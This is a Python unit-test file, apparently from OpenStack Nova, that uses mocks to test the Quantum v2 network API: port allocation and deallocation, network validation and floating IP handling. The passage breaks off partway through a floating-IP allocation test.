def setUp(self):
super(TestQuantumv2, self).setUp()
self.addCleanup(CONF.reset)
self.mox.StubOutWithMock(quantumv2, 'get_client')
self.moxed_client = self.mox.CreateMock(client.Client)
quantumv2.get_client(mox.IgnoreArg()).MultipleTimes().AndReturn(
self.moxed_client)
self.context = context.RequestContext('userid', 'my_tenantid')
setattr(self.context,
'auth_token',
'bff4a5a6b9eb4ea2a6efec6eefb77936')
self.instance = {'project_id': '9d049e4b60b64716978ab415e6fbd5c0',
'uuid': str(uuid.uuid4()),
'display_name': 'test_instance',
'availability_zone': 'nova',
'security_groups': []}
self.nets1 = [{'id': 'my_netid1',
'name': 'my_netname1',
'tenant_id': 'my_tenantid'}]
self.nets2 = []
self.nets2.append(self.nets1[0])
self.nets2.append({'id': 'my_netid2',
'name': 'my_netname2',
'tenant_id': 'my_tenantid'})
self.nets3 = self.nets2 + [{'id': 'my_netid3',
'name': 'my_netname3',
'tenant_id': 'my_tenantid'}]
self.nets4 = [{'id': 'his_netid4',
'name': 'his_netname4',
'tenant_id': 'his_tenantid'}]
self.nets = [self.nets1, self.nets2, self.nets3, self.nets4]
self.port_address = '10.0.1.2'
self.port_data1 = [{'network_id': 'my_netid1',
'device_id': 'device_id1',
'device_owner': 'compute:nova',
'id': 'my_portid1',
'fixed_ips': [{'ip_address': self.port_address,
'subnet_id': 'my_subid1'}],
'mac_address': 'my_mac1', }]
self.float_data1 = [{'port_id': 'my_portid1',
'fixed_ip_address': self.port_address,
'floating_ip_address': '172.0.1.2'}]
self.dhcp_port_data1 = [{'fixed_ips': [{'ip_address': '10.0.1.9',
'subnet_id': 'my_subid1'}]}]
self.port_data2 = []
self.port_data2.append(self.port_data1[0])
self.port_data2.append({'network_id': 'my_netid2',
'device_id': 'device_id2',
'device_owner': 'compute:nova',
'id': 'my_portid2',
'fixed_ips': [{'ip_address': '10.0.2.2',
'subnet_id': 'my_subid2'}],
'mac_address': 'my_mac2', })
self.float_data2 = []
self.float_data2.append(self.float_data1[0])
self.float_data2.append({'port_id': 'my_portid2',
'fixed_ip_address': '10.0.2.2',
'floating_ip_address': '172.0.2.2'})
self.port_data3 = [{'network_id': 'my_netid1',
'device_id': 'device_id3',
'device_owner': 'compute:nova',
'id': 'my_portid3',
'fixed_ips': [], # no fixed ip
'mac_address': 'my_mac3', }]
self.subnet_data1 = [{'id': 'my_subid1',
'cidr': '10.0.1.0/24',
'network_id': 'my_netid1',
'gateway_ip': '10.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']}]
self.subnet_data2 = []
self.subnet_data_n = [{'id': 'my_subid1',
'cidr': '10.0.1.0/24',
'network_id': 'my_netid1',
'gateway_ip': '10.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']},
{'id': 'my_subid2',
'cidr': '20.0.1.0/24',
'network_id': 'my_netid2',
'gateway_ip': '20.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']}]
self.subnet_data2.append({'id': 'my_subid2',
'cidr': '10.0.2.0/24',
'network_id': 'my_netid2',
'gateway_ip': '10.0.2.1',
'dns_nameservers': ['8.8.2.1', '8.8.2.2']})
self.fip_pool = {'id': '4fdbfd74-eaf8-4884-90d9-00bd6f10c2d3',
'name': 'ext_net',
'router:external': True,
'tenant_id': 'admin_tenantid'}
self.fip_pool_nova = {'id': '435e20c3-d9f1-4f1b-bee5-4611a1dd07db',
'name': 'nova',
'router:external': True,
'tenant_id': 'admin_tenantid'}
self.fip_unassociated = {'tenant_id': 'my_tenantid',
'id': 'fip_id1',
'floating_ip_address': '172.24.4.227',
'floating_network_id': self.fip_pool['id'],
'port_id': None,
'fixed_ip_address': None,
'router_id': None}
fixed_ip_address = self.port_data2[1]['fixed_ips'][0]['ip_address']
self.fip_associated = {'tenant_id': 'my_tenantid',
'id': 'fip_id2',
'floating_ip_address': '172.24.4.228',
'floating_network_id': self.fip_pool['id'],
'port_id': self.port_data2[1]['id'],
'fixed_ip_address': fixed_ip_address,
'router_id': 'router_id1'}
self._returned_nw_info = []
self.addCleanup(self.stubs.UnsetAll)
self.addCleanup(self.mox.UnsetStubs)
self.addCleanup(self.mox.VerifyAll)
def _verify_nw_info(self, nw_inf, index=0):
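        # The test fixtures encode the 1-based port index in the addresses,
        # network names, port ids and subnets checked below.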
id_suffix = index + 1
self.assertEquals('10.0.%s.2' % id_suffix,
nw_inf.fixed_ips()[index]['address'])
self.assertEquals('172.0.%s.2' % id_suffix,
nw_inf.fixed_ips()[index].floating_ip_addresses()[0])
self.assertEquals('my_netname%s' % id_suffix,
nw_inf[index]['network']['label'])
self.assertEquals('my_portid%s' % id_suffix, nw_inf[index]['id'])
self.assertEquals('my_mac%s' % id_suffix, nw_inf[index]['address'])
self.assertEquals('10.0.%s.0/24' % id_suffix,
nw_inf[index]['network']['subnets'][0]['cidr'])
self.assertTrue(model.IP(address='8.8.%s.1' % id_suffix) in
nw_inf[index]['network']['subnets'][0]['dns'])
def _get_instance_nw_info(self, number):
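        """Mock the Quantum calls for `number` ports and verify the
        network info returned by get_instance_nw_info."""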
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(mox.IgnoreArg(),
self.instance['uuid'],
mox.IgnoreArg())
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data})
nets = number == 1 and self.nets1 or self.nets2
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn({'networks': nets})
self.moxed_client.list_networks(
shared=True).AndReturn({'networks': []})
for i in xrange(1, number + 1):
float_data = number == 1 and self.float_data1 or self.float_data2
for ip in port_data[i - 1]['fixed_ips']:
float_data = [x for x in float_data
if x['fixed_ip_address'] == ip['ip_address']]
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=port_data[i - 1]['id']).AndReturn(
{'floatingips': float_data})
subnet_data = i == 1 and self.subnet_data1 or self.subnet_data2
self.moxed_client.list_subnets(
id=mox.SameElementsAs(['my_subid%s' % i])).AndReturn(
{'subnets': subnet_data})
self.moxed_client.list_ports(
network_id=subnet_data[0]['network_id'],
device_owner='network:dhcp').AndReturn(
{'ports': []})
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context, self.instance)
for i in xrange(0, number):
self._verify_nw_info(nw_inf, i)
def test_get_instance_nw_info_1(self):
# Test to get one port in one network and subnet.
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self._get_instance_nw_info(1)
def test_get_instance_nw_info_2(self):
# Test to get one port in each of two networks and subnets.
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self._get_instance_nw_info(2)
def test_get_instance_nw_info_with_nets(self):
# Test get instance_nw_info with networks passed in.
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(
mox.IgnoreArg(),
self.instance['uuid'], mox.IgnoreArg())
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': self.port_data1})
port_data = self.port_data1
for ip in port_data[0]['fixed_ips']:
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=port_data[0]['id']).AndReturn(
{'floatingips': self.float_data1})
self.moxed_client.list_subnets(
id=mox.SameElementsAs(['my_subid1'])).AndReturn(
{'subnets': self.subnet_data1})
self.moxed_client.list_ports(
network_id='my_netid1',
device_owner='network:dhcp').AndReturn(
{'ports': self.dhcp_port_data1})
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context,
self.instance,
networks=self.nets1)
self._verify_nw_info(nw_inf, 0)
def test_get_instance_nw_info_without_subnet(self):
# Test get instance_nw_info for a port without subnet.
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(
mox.IgnoreArg(),
self.instance['uuid'], mox.IgnoreArg())
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': self.port_data3})
self.moxed_client.list_networks(
shared=False,
tenant_id=self.instance['project_id']).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
shared=True).AndReturn({'networks': []})
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context,
self.instance)
id_suffix = 3
self.assertEquals(0, len(nw_inf.fixed_ips()))
self.assertEquals('my_netname1', nw_inf[0]['network']['label'])
self.assertEquals('my_portid%s' % id_suffix, nw_inf[0]['id'])
self.assertEquals('my_mac%s' % id_suffix, nw_inf[0]['address'])
self.assertEquals(0, len(nw_inf[0]['network']['subnets']))
def test_refresh_quantum_extensions_cache(self):
api = quantumapi.API()
self.moxed_client.list_extensions().AndReturn(
{'extensions': [{'name': 'nvp-qos'}]})
self.mox.ReplayAll()
api._refresh_quantum_extensions_cache()
self.assertEquals({'nvp-qos': {'name': 'nvp-qos'}}, api.extensions)
def test_populate_quantum_extension_values_rxtx_factor(self):
api = quantumapi.API()
self.moxed_client.list_extensions().AndReturn(
{'extensions': [{'name': 'nvp-qos'}]})
self.mox.ReplayAll()
instance_type = instance_types.get_default_instance_type()
instance_type['rxtx_factor'] = 1
sys_meta = utils.dict_to_metadata(
instance_types.save_instance_type_info({}, instance_type))
instance = {'system_metadata': sys_meta}
port_req_body = {'port': {}}
api._populate_quantum_extension_values(instance, port_req_body)
self.assertEquals(port_req_body['port']['rxtx_factor'], 1)
def _stub_allocate_for_instance(self, net_idx=1, **kwargs):
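        """Mock the Quantum client calls made by allocate_for_instance.
        The optional '_break' kwarg stops the mock setup at the named stage."""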
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_get_instance_nw_info')
self.mox.StubOutWithMock(api, '_populate_quantum_extension_values')
# Net idx is 1-based for compatibility with existing unit tests
nets = self.nets[net_idx - 1]
ports = {}
fixed_ips = {}
macs = kwargs.get('macs')
if macs:
macs = set(macs)
req_net_ids = []
if 'requested_networks' in kwargs:
for id, fixed_ip, port_id in kwargs['requested_networks']:
if port_id:
self.moxed_client.show_port(port_id).AndReturn(
{'port': {'id': 'my_portid1',
'network_id': 'my_netid1',
'mac_address': 'my_mac1'}})
ports['my_netid1'] = self.port_data1[0]
id = 'my_netid1'
if macs is not None:
macs.discard('my_mac1')
else:
fixed_ips[id] = fixed_ip
req_net_ids.append(id)
expected_network_order = req_net_ids
else:
expected_network_order = [n['id'] for n in nets]
if kwargs.get('_break') == 'pre_list_networks':
self.mox.ReplayAll()
return api
search_ids = [net['id'] for net in nets if net['id'] in req_net_ids]
mox_list_network_params = dict(tenant_id=self.instance['project_id'],
shared=False)
if search_ids:
mox_list_network_params['id'] = mox.SameElementsAs(search_ids)
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': nets})
mox_list_network_params = dict(shared=True)
if search_ids:
mox_list_network_params['id'] = mox.SameElementsAs(search_ids)
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': []})
for net_id in expected_network_order:
if kwargs.get('_break') == 'net_id2':
self.mox.ReplayAll()
return api
port_req_body = {
'port': {
'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
},
}
port = ports.get(net_id, None)
if port:
port_id = port['id']
self.moxed_client.update_port(port_id,
MyComparator(port_req_body)
).AndReturn(
{'port': port})
else:
fixed_ip = fixed_ips.get(net_id)
if fixed_ip:
port_req_body['port']['fixed_ips'] = [{'ip_address':
fixed_ip}]
port_req_body['port']['network_id'] = net_id
port_req_body['port']['admin_state_up'] = True
port_req_body['port']['tenant_id'] = \
self.instance['project_id']
if macs:
port_req_body['port']['mac_address'] = macs.pop()
res_port = {'port': {'id': 'fake'}}
api._populate_quantum_extension_values(
self.instance, port_req_body).AndReturn(None)
self.moxed_client.create_port(
MyComparator(port_req_body)).AndReturn(res_port)
if kwargs.get('_break') == 'pre_get_instance_nw_info':
self.mox.ReplayAll()
return api
api._get_instance_nw_info(mox.IgnoreArg(),
self.instance,
networks=nets).AndReturn(
self._returned_nw_info)
self.mox.ReplayAll()
return api
def _allocate_for_instance(self, net_idx=1, **kwargs):
api = self._stub_allocate_for_instance(net_idx, **kwargs)
return api.allocate_for_instance(self.context, self.instance, **kwargs)
def test_allocate_for_instance_1(self):
# Allocate one port in one network env.
self._allocate_for_instance(1)
def test_allocate_for_instance_2(self):
# Allocate one port in two networks env.
self._allocate_for_instance(2)
def test_allocate_for_instance_accepts_macs_kwargs_None(self):
# The macs kwarg should be accepted as None.
self._allocate_for_instance(1, macs=None)
def test_allocate_for_instance_accepts_macs_kwargs_set(self):
        # The macs kwarg should be accepted as a set; the
        # _allocate_for_instance helper checks that the mac is used to
        # create a port.
self._allocate_for_instance(1, macs=set(['ab:cd:ef:01:23:45']))
def test_allocate_for_instance_accepts_only_portid(self):
# Make sure allocate_for_instance works when only a portid is provided
self._returned_nw_info = self.port_data1
result = self._allocate_for_instance(
requested_networks=[(None, None, 'my_portid1')])
self.assertEqual(self.port_data1, result)
def test_allocate_for_instance_not_enough_macs_via_ports(self):
# using a hypervisor MAC via a pre-created port will stop it being
# used to dynamically create a port on a network. We put the network
# first in requested_networks so that if the code were to not pre-check
# requested ports, it would incorrectly assign the mac and not fail.
requested_networks = [
(self.nets2[1]['id'], None, None),
(None, None, 'my_portid1')]
api = self._stub_allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac1']),
_break='net_id2')
self.assertRaises(exception.PortNotFree,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['my_mac1']))
def test_allocate_for_instance_not_enough_macs(self):
# If not enough MAC addresses are available to allocate to networks, an
# error should be raised.
# We could pass in macs=set(), but that wouldn't tell us that
# allocate_for_instance tracks used macs properly, so we pass in one
# mac, and ask for two networks.
requested_networks = [
(self.nets2[1]['id'], None, None),
(self.nets2[0]['id'], None, None)]
api = self._stub_allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac2']),
_break='pre_get_instance_nw_info')
self.assertRaises(exception.PortNotFree,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['my_mac2']))
def test_allocate_for_instance_two_macs_two_networks(self):
# If two MACs are available and two networks requested, two new ports
# get made and no exceptions raised.
requested_networks = [
(self.nets2[1]['id'], None, None),
(self.nets2[0]['id'], None, None)]
self._allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac2', 'my_mac1']))
def test_allocate_for_instance_mac_conflicting_requested_port(self):
# specify only first and last network
requested_networks = [(None, None, 'my_portid1')]
api = self._stub_allocate_for_instance(
net_idx=1, requested_networks=requested_networks,
macs=set(['unknown:mac']),
_break='pre_list_networks')
self.assertRaises(exception.PortNotUsable,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['unknown:mac']))
def test_allocate_for_instance_with_requested_networks(self):
# specify only first and last network
requested_networks = [
(net['id'], None, None)
for net in (self.nets3[1], self.nets3[0], self.nets3[2])]
self._allocate_for_instance(net_idx=3,
requested_networks=requested_networks)
def test_allocate_for_instance_with_requested_networks_with_fixedip(self):
# specify only first and last network
requested_networks = [(self.nets1[0]['id'], '10.0.1.0/24', None)]
self._allocate_for_instance(net_idx=1,
requested_networks=requested_networks)
def test_allocate_for_instance_with_requested_networks_with_port(self):
requested_networks = [(None, None, 'myportid1')]
self._allocate_for_instance(net_idx=1,
requested_networks=requested_networks)
    def test_allocate_for_instance_ex1(self):
        """Verify we delete the created ports if we fail to allocate all net resources.
        Mox is set up to raise an exception when creating the second port.
        In this case, the code should delete the first created port.
        """
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_populate_quantum_extension_values')
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
index = 0
for network in self.nets2:
port_req_body = {
'port': {
'network_id': network['id'],
'admin_state_up': True,
'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
'tenant_id': self.instance['project_id'],
},
}
port = {'id': 'portid_' + network['id']}
api._populate_quantum_extension_values(
self.instance, port_req_body).AndReturn(None)
if index == 0:
self.moxed_client.create_port(
MyComparator(port_req_body)).AndReturn({'port': port})
else:
self.moxed_client.create_port(
MyComparator(port_req_body)).AndRaise(
Exception("fail to create port"))
index += 1
self.moxed_client.delete_port('portid_' + self.nets2[0]['id'])
self.mox.ReplayAll()
self.assertRaises(QUANTUM_CLIENT_EXCEPTION, api.allocate_for_instance,
self.context, self.instance)
    def test_allocate_for_instance_ex2(self):
        """Verify there is no port to delete if the first allocation fails.
        Mox is set up to raise an exception when creating the first port.
        In this case, the code should not delete any ports.
        """
api = quantumapi.API()
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
port_req_body = {
'port': {
'network_id': self.nets2[0]['id'],
'admin_state_up': True,
'device_id': self.instance['uuid'],
'tenant_id': self.instance['project_id'],
},
}
self.moxed_client.create_port(
MyComparator(port_req_body)).AndRaise(
Exception("fail to create port"))
self.mox.ReplayAll()
self.assertRaises(QUANTUM_CLIENT_EXCEPTION, api.allocate_for_instance,
self.context, self.instance)
def test_allocate_for_instance_no_port_or_network(self):
class BailOutEarly(Exception):
pass
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_get_available_networks')
# Make sure we get an empty list and then bail out of the rest
# of the function
api._get_available_networks(self.context, self.instance['project_id'],
[]).AndRaise(BailOutEarly)
self.mox.ReplayAll()
self.assertRaises(BailOutEarly,
api.allocate_for_instance,
self.context, self.instance,
requested_networks=[(None, None, None)])
def test_allocate_for_instance_second_time(self):
# Make sure that allocate_for_instance only returns ports that it
# allocated during _that_ run.
new_port = {'id': 'fake'}
self._returned_nw_info = self.port_data1 + [new_port]
nw_info = self._allocate_for_instance()
self.assertEqual(nw_info, [new_port])
def _deallocate_for_instance(self, number):
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.list_ports(
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data})
for port in port_data:
self.moxed_client.delete_port(port['id'])
self.mox.ReplayAll()
api = quantumapi.API()
api.deallocate_for_instance(self.context, self.instance)
def test_deallocate_for_instance_1(self):
# Test to deallocate in one port env.
self._deallocate_for_instance(1)
def test_deallocate_for_instance_2(self):
# Test to deallocate in two ports env.
self._deallocate_for_instance(2)
def _test_deallocate_port_for_instance(self, number):
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.delete_port(port_data[0]['id'])
nets = [port_data[0]['network_id']]
quantumv2.get_client(mox.IgnoreArg(), admin=True).AndReturn(
self.moxed_client)
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data[1:]})
quantumv2.get_client(mox.IgnoreArg()).MultipleTimes().AndReturn(
self.moxed_client)
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': [self.nets2[1]]})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
float_data = number == 1 and self.float_data1 or self.float_data2
for data in port_data[1:]:
for ip in data['fixed_ips']:
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=data['id']).AndReturn(
{'floatingips': float_data[1:]})
for port in port_data[1:]:
self.moxed_client.list_subnets(id=['my_subid2']).AndReturn({})
self.mox.ReplayAll()
api = quantumapi.API()
nwinfo = api.deallocate_port_for_instance(self.context, self.instance,
port_data[0]['id'])
self.assertEqual(len(nwinfo), len(port_data[1:]))
if len(port_data) > 1:
self.assertEqual(nwinfo[0]['network']['id'], 'my_netid2')
def test_deallocate_port_for_instance_1(self):
# Test to deallocate the first and only port
self._test_deallocate_port_for_instance(1)
def test_deallocate_port_for_instance_2(self):
# Test to deallocate the first port of two
self._test_deallocate_port_for_instance(2)
def test_list_ports(self):
search_opts = {'parm': 'value'}
self.moxed_client.list_ports(**search_opts)
self.mox.ReplayAll()
quantumapi.API().list_ports(self.context, **search_opts)
def test_show_port(self):
self.moxed_client.show_port('foo')
self.mox.ReplayAll()
quantumapi.API().show_port(self.context, 'foo')
def test_validate_networks(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
api.validate_networks(self.context, requested_networks)
def test_validate_networks_ex_1(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
try:
api.validate_networks(self.context, requested_networks)
except exception.NetworkNotFound as ex:
self.assertTrue("my_netid2" in str(ex))
def test_validate_networks_ex_2(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None),
('my_netid3', 'test3', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2', 'my_netid3']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2', 'my_netid3']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
try:
api.validate_networks(self.context, requested_networks)
except exception.NetworkNotFound as ex:
self.assertTrue("my_netid2, my_netid3" in str(ex))
def _mock_list_ports(self, port_data=None):
if port_data is None:
port_data = self.port_data2
address = self.port_address
self.moxed_client.list_ports(
fixed_ips=MyComparator('ip_address=%s' % address)).AndReturn(
{'ports': port_data})
self.mox.ReplayAll()
return address
def test_get_instance_uuids_by_ip_filter(self):
self._mock_list_ports()
filters = {'ip': '^10\\.0\\.1\\.2$'}
api = quantumapi.API()
result = api.get_instance_uuids_by_ip_filter(self.context, filters)
self.assertEquals('device_id1', result[0]['instance_uuid'])
self.assertEquals('device_id2', result[1]['instance_uuid'])
def test_get_fixed_ip_by_address_fails_for_no_ports(self):
address = self._mock_list_ports(port_data=[])
api = quantumapi.API()
self.assertRaises(exception.FixedIpNotFoundForAddress,
api.get_fixed_ip_by_address,
self.context, address)
def test_get_fixed_ip_by_address_succeeds_for_1_port(self):
address = self._mock_list_ports(port_data=self.port_data1)
api = quantumapi.API()
result = api.get_fixed_ip_by_address(self.context, address)
self.assertEquals('device_id1', result['instance_uuid'])
def test_get_fixed_ip_by_address_fails_for_more_than_1_port(self):
address = self._mock_list_ports()
api = quantumapi.API()
self.assertRaises(exception.FixedIpAssociatedWithMultipleInstances,
api.get_fixed_ip_by_address,
self.context, address)
def _get_available_networks(self, prv_nets, pub_nets, req_ids=None):
api = quantumapi.API()
nets = prv_nets + pub_nets
mox_list_network_params = dict(tenant_id=self.instance['project_id'],
shared=False)
if req_ids:
mox_list_network_params['id'] = req_ids
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': prv_nets})
mox_list_network_params = dict(shared=True)
if req_ids:
mox_list_network_params['id'] = req_ids
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': pub_nets})
self.mox.ReplayAll()
rets = api._get_available_networks(self.context,
self.instance['project_id'],
req_ids)
self.assertEqual(rets, nets)
def test_get_available_networks_all_private(self):
self._get_available_networks(prv_nets=self.nets2, pub_nets=[])
def test_get_available_networks_all_public(self):
self._get_available_networks(prv_nets=[], pub_nets=self.nets2)
def test_get_available_networks_private_and_public(self):
self._get_available_networks(prv_nets=self.nets1, pub_nets=self.nets4)
def test_get_available_networks_with_network_ids(self):
prv_nets = [self.nets3[0]]
pub_nets = [self.nets3[-1]]
# specify only first and last network
req_ids = [net['id'] for net in (self.nets3[0], self.nets3[-1])]
self._get_available_networks(prv_nets, pub_nets, req_ids)
def test_get_floating_ip_pools(self):
api = quantumapi.API()
search_opts = {'router:external': True}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool, self.fip_pool_nova]})
self.mox.ReplayAll()
pools = api.get_floating_ip_pools(self.context)
expected = [{'name': self.fip_pool['name']},
{'name': self.fip_pool_nova['name']}]
self.assertEqual(expected, pools)
def _get_expected_fip_model(self, fip_data, idx=0):
expected = {'id': fip_data['id'],
'address': fip_data['floating_ip_address'],
'pool': self.fip_pool['name'],
'project_id': fip_data['tenant_id'],
'fixed_ip_id': fip_data['port_id'],
'fixed_ip':
{'address': fip_data['fixed_ip_address']},
'instance': ({'uuid': self.port_data2[idx]['device_id']}
if fip_data['port_id']
else None)}
return expected
def _test_get_floating_ip(self, fip_data, idx=0, by_address=False):
api = quantumapi.API()
fip_id = fip_data['id']
net_id = fip_data['floating_network_id']
address = fip_data['floating_ip_address']
if by_address:
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [fip_data]})
else:
self.moxed_client.show_floatingip(fip_id).\
AndReturn({'floatingip': fip_data})
self.moxed_client.show_network(net_id).\
AndReturn({'network': self.fip_pool})
if fip_data['port_id']:
self.moxed_client.show_port(fip_data['port_id']).\
AndReturn({'port': self.port_data2[idx]})
self.mox.ReplayAll()
expected = self._get_expected_fip_model(fip_data, idx)
if by_address:
fip = api.get_floating_ip_by_address(self.context, address)
else:
fip = api.get_floating_ip(self.context, fip_id)
self.assertEqual(expected, fip)
def test_get_floating_ip_unassociated(self):
self._test_get_floating_ip(self.fip_unassociated, idx=0)
def test_get_floating_ip_associated(self):
self._test_get_floating_ip(self.fip_associated, idx=1)
def test_get_floating_ip_by_address(self):
self._test_get_floating_ip(self.fip_unassociated, idx=0,
by_address=True)
def test_get_floating_ip_by_address_associated(self):
self._test_get_floating_ip(self.fip_associated, idx=1,
by_address=True)
def test_get_floating_ip_by_address_not_found(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': []})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpNotFoundForAddress,
api.get_floating_ip_by_address,
self.context, address)
def test_get_floating_ip_by_address_multiple_found(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_unassociated] * 2})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpMultipleFoundForAddress,
api.get_floating_ip_by_address,
self.context, address)
def test_get_floating_ips_by_project(self):
api = quantumapi.API()
project_id = self.context.project_id
self.moxed_client.list_floatingips(tenant_id=project_id).\
AndReturn({'floatingips': [self.fip_unassociated,
self.fip_associated]})
search_opts = {'router:external': True}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool, self.fip_pool_nova]})
self.moxed_client.list_ports(tenant_id=project_id).\
AndReturn({'ports': self.port_data2})
self.mox.ReplayAll()
expected = [self._get_expected_fip_model(self.fip_unassociated),
self._get_expected_fip_model(self.fip_associated, idx=1)]
fips = api.get_floating_ips_by_project(self.context)
self.assertEqual(expected, fips)
def _test_get_instance_id_by_floating_address(self, fip_data,
associated=False):
api = quantumapi.API()
address = fip_data['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [fip_data]})
if associated:
self.moxed_client.show_port(fip_data['port_id']).\
AndReturn({'port': self.port_data2[1]})
self.mox.ReplayAll()
if associated:
expected = self.port_data2[1]['device_id']
else:
expected = None
fip = api.get_instance_id_by_floating_address(self.context, address)
self.assertEqual(expected, fip)
def test_get_instance_id_by_floating_address(self):
self._test_get_instance_id_by_floating_address(self.fip_unassociated)
def test_get_instance_id_by_floating_address_associated(self):
self._test_get_instance_id_by_floating_address(self.fip_associated,
associated=True)
def test_allocate_floating_ip(self):
api = quantumapi.API()
pool_name = self.fip_pool['name']
pool_id = self.fip_pool['id']
search_opts = {'router:external': True,
'fields': 'id',
'name': pool_name}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context, 'ext_net')
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_allocate_floating_ip_with_pool_id(self):
api = quantumapi.API()
pool_name = self.fip_pool['name']
pool_id = self.fip_pool['id']
search_opts = {'router:external': True,
'fields': 'id',
'id': pool_id}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context, pool_id)
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_allocate_floating_ip_with_default_pool(self):
api = quantumapi.API()
pool_name = self.fip_pool_nova['name']
pool_id = self.fip_pool_nova['id']
search_opts = {'router:external': True,
'fields': 'id',
'name': pool_name}
self.moxed_client.list_networks(**search_opts).\
